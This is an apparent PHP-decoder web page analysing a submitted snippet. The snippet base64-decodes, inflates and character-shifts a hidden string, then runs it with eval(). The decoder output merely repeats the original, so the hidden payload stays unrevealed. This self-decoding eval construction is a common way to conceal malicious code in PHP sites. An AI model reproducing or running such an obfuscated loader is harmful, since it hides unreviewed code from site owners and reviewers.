Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function rweoTt($NGO) { $NGO=gzinflate(base64_decode($NGO)); for($i=0;$i<strlen..
Decoded Output download
<?php function rweoTt($NGO)
{
$NGO=gzinflate(base64_decode($NGO));
for($i=0;$i<strlen($NGO);$i++)
{
$NGO[$i] = chr(ord($NGO[$i])-1);
}
return $NGO;
}eval(rweoTt("U1QEAu6s/JTcstQ0TQ19fYPCzMKi4pSC1DSDouKklJS0khJ9oJCGlg23gz0A"));?>
Did this file decode correctly?
Original Code
<?php function rweoTt($NGO)
{
$NGO=gzinflate(base64_decode($NGO));
for($i=0;$i<strlen($NGO);$i++)
{
$NGO[$i] = chr(ord($NGO[$i])-1);
}
return $NGO;
}eval(rweoTt("U1QEAu6s/JTcstQ0TQ19fYPCzMKi4pSC1DSDouKklJS0khJ9oJCGlg23gz0A"));?>
Function Calls
chr | 46 |
ord | 46 |
rweoTt | 1 |
strlen | 47 |
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 1f877fef6782ddc880a197e733a39877 |
Eval Count | 1 |
Decode Time | 290 ms |